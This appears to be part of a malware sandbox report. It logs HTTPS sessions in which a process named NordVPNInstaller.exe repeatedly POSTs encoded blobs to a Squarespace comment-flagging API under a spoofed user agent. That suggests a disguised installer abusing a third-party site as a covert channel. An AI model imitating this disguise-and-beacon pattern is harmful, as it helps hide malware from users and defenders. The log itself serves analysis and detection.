2024-09-01 19:56:38 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:38 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:38 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:38 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:38 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BXdGsWdW8_pCYTI5MjE5ZGY4ZWEwNzE5NTYwOWYxOThhZWE1MDEz; Path=/; Secure Set-Cookie: crumb=BZZeSO9mTbd3NDY5NDlhNGJlNjNjMjQ1MjBiOGJlZDIzZWU2NTdi; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: gdCaaqC2/OuTf0K2f Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BZZeSO9mTbd3NDY5NDlhNGJlNjNjMjQ1MjBiOGJlZDIzZWU2NTdi"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49824	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:39 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:39 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:39 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:39 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:39 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:39 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BZGcdc_rqeq8MWE0MjBhZmZiZTJjNjBhMzU5M2U2YTRkMzBkZTdh; Path=/; Secure Set-Cookie: crumb=BS4-NItX7H6tOGIwMTk1YmJiZTM4ZjIzZjNhZTdiZWEwYjY0NTEz; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 3wJHkkdG/VJWneVJJ Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BS4-NItX7H6tOGIwMTk1YmJiZTM4ZjIzZjNhZTdiZWEwYjY0NTEz"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49825	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:39 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 322 Expect: 100-continue
2024-09-01 19:56:39 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:39 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:39 UTC	321	OUT	Data Raw: 3d 66 4c 74 30 72 76 63 61 63 36 34 25 32 42 45 48 38 71 74 46 37 73 59 45 33 62 79 6b 47 48 39 58 25 32 42 7a 78 63 35 4b 38 35 54 4c 75 7a 54 62 6d 6e 38 66 75 34 31 70 34 2f 6d 53 6f 44 4b 76 6b 66 5a 31 50 52 7a 48 6e 43 31 4a 70 35 6e 45 59 67 74 73 4e 77 6a 68 4d 61 71 4a 37 35 75 4a 46 44 67 6a 63 61 58 53 62 44 58 4a 71 41 63 66 2f 6e 38 53 46 6e 4c 48 31 5a 49 77 6d 6f 45 6b 68 47 37 37 2f 42 6f 65 30 4f 5a 72 62 4b 6a 78 36 66 62 68 66 34 77 32 39 32 5a 73 79 37 64 35 56 72 52 62 6c 38 58 31 39 75 4e 38 73 6a 6d 32 73 32 68 31 72 39 4c 45 54 5a 45 47 2f 4d 6f 72 42 56 4e 33 33 67 31 53 51 4b 45 5a 72 44 72 36 45 35 55 41 46 67 30 65 53 5a 59 46 7a 7a 77 65 70 64 57 68 74 39 45 51 47 6c 6c 69 6f 6f 56 6d 41 6b 72 6c 25 32 42 2f 48 77 69 33 36 68 Data Ascii: =fLt0rvcac64%2BEH8qtF7sYE3bykGH9X%2Bzxc5K85TLuzTbmn8fu41p4/mSoDKvkfZ1PRzHnC1Jp5nEYgtsNwjhMaqJ75uJFDgjcaXSbDXJqAcf/n8SFnLH1ZIwmoEkhG77/Boe0OZrbKjx6fbhf4w292Zsy7d5VrRbl8X19uN8sjm2s2h1r9LETZEG/MorBVN33g1SQKEZrDr6E5UAFg0eSZYFzzwepdWht9EQGlliooVmAkrl%2B/Hwi36h
2024-09-01 19:56:39 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:39 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BZY6EYzRB5sWMjQ2Y2FkNTg0YTk5NjY5N2VkNzBhNmYzMjJiNGFm; Path=/; Secure Set-Cookie: crumb=BcJatoFsA7gHY2RjZWNiNjQ1MGY5NmQ1YzM4MmQwYmQ1ZDJjNDkz; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: WGkp2sLm/MhzV6N2x Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BcJatoFsA7gHY2RjZWNiNjQ1MGY5NmQ1YzM4MmQwYmQ1ZDJjNDkz"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49826	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:40 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:40 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:40 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:40 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:40 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:40 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BTeeykM_0p60MjFhNTVhNDBhOTNlZGI3NTFlOTE2ZjQyNGMxNWU5; Path=/; Secure Set-Cookie: crumb=BckAn_paJIGcNjRjMjljY2U0M2FkNmY4OWYwNjUyNGY5NmU3MWNl; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: EmcDXMj7/8A1pu3if Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BckAn_paJIGcNjRjMjljY2U0M2FkNmY4OWYwNjUyNGY5NmU3MWNl"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	49827	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:40 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:40 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:40 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:40 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:40 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:40 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BTTNkJZlcj8LZGIwY2ZmZDFlNjY4ZGU2N2QyNGUzZDIzZDg1ODI2; Path=/; Secure Set-Cookie: crumb=Bc-DvNDePsRVNDdkOGRiZWE5MjA0MTFhZmU4MzkzYmZiNTQ4OGQ4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: DuU5NVuO/LczDkx8Z Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Bc-DvNDePsRVNDdkOGRiZWE5MjA0MTFhZmU4MzkzYmZiNTQ4OGQ4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49829	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:40 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:40 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:40 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:40 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:41 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:40 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bb7oQ8kl6Z0fNzI2NDIxNzYyZmUwMTE0MTVkNDhlMTM0YWQwZDRl; Path=/; Secure Set-Cookie: crumb=Bfei0UVgXL6FZDA4ZThmYmY1NTI0MTBkYjExYWYwZGI3NDJiY2I4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: QGlXGiFG/uRG0Fdzl Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Bfei0UVgXL6FZDA4ZThmYmY1NTI0MTBkYjExYWYwZGI3NDJiY2I4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	49830	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:40 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 322 Expect: 100-continue
2024-09-01 19:56:41 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:41 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:41 UTC	321	OUT	Data Raw: 3d 66 4c 74 30 72 76 63 61 63 36 34 25 32 42 45 48 38 71 74 46 37 73 59 45 33 62 79 6b 47 48 39 58 25 32 42 7a 78 63 35 4b 38 35 54 4c 75 7a 54 62 6d 6e 38 66 75 34 31 70 34 2f 6d 53 6f 44 4b 76 6b 66 5a 31 50 52 7a 48 6e 43 31 4a 70 35 6e 45 59 67 74 73 4e 77 6a 68 4d 61 71 4a 37 35 75 4a 46 44 67 6a 63 61 58 53 62 44 58 4a 71 41 63 66 2f 6e 38 53 46 6e 4c 48 31 5a 49 77 6d 6f 45 6b 68 47 37 37 2f 42 6f 65 30 4f 5a 72 62 4b 6a 78 36 66 62 68 66 34 77 32 39 32 5a 73 79 37 64 35 56 72 52 62 6c 38 58 31 39 75 4e 38 73 6a 6d 32 73 32 68 31 72 39 4c 45 54 5a 45 47 2f 4d 6f 72 42 56 4e 33 33 67 31 53 51 4b 45 5a 72 44 72 36 45 35 55 41 46 67 30 65 53 5a 59 46 7a 7a 77 65 70 64 57 68 74 39 45 51 47 6c 6c 69 6f 6f 56 6d 41 6b 72 6c 25 32 42 2f 48 77 69 33 36 68 Data Ascii: =fLt0rvcac64%2BEH8qtF7sYE3bykGH9X%2Bzxc5K85TLuzTbmn8fu41p4/mSoDKvkfZ1PRzHnC1Jp5nEYgtsNwjhMaqJ75uJFDgjcaXSbDXJqAcf/n8SFnLH1ZIwmoEkhG77/Boe0OZrbKjx6fbhf4w292Zsy7d5VrRbl8X19uN8sjm2s2h1r9LETZEG/MorBVN33g1SQKEZrDr6E5UAFg0eSZYFzzwepdWht9EQGlliooVmAkrl%2B/Hwi36h
2024-09-01 19:56:41 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:41 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BXtmh9yzb5vZODg4MmFlMGZmMjVhYWFlMzE0ZjcxMWU4N2E5MmMw; Path=/; Secure Set-Cookie: crumb=BTws-FwSQdkzOWUxZmZlMTA1MmRlZjU1NDk1NmJhN2M3ZGRjNWQw; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: innY7flJ/M4bSirfS Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BTws-FwSQdkzOWUxZmZlMTA1MmRlZjU1NDk1NmJhN2M3ZGRjNWQw"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	49831	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:41 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:41 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:41 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:41 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:41 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:41 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BTHI74a3HEz0M2UyNWRkMGQyNTlmNjQyMWZjMGVkYjQwODdmMjZk; Path=/; Secure Set-Cookie: crumb=BZxvN7TQT2IQYWQ2MjI4OGJjZjQzMWE1NTBmMjgzMzlkMjFhNjI4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: MCTCifLH/TV2LGqUr Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BZxvN7TQT2IQYWQ2MjI4OGJjZjQzMWE1NTBmMjgzMzlkMjFhNjI4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	49832	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:41 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:41 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:41 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:41 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:41 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:41 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BRIwr97EdBEnZTE0ZjFkMDU0YzBkODgxYWY3ZGMyMjliOWU5NTdl; Path=/; Secure Set-Cookie: crumb=BZ4WF9Po6lJTYzc5ZTMwZWEzNGNjOGViM2ExZjUzNTQ5YzRhNzY0; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: rXqIzGDw/678HxJ1w Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BZ4WF9Po6lJTYzc5ZTMwZWEzNGNjOGViM2ExZjUzNTQ5YzRhNzY0"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	49834	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
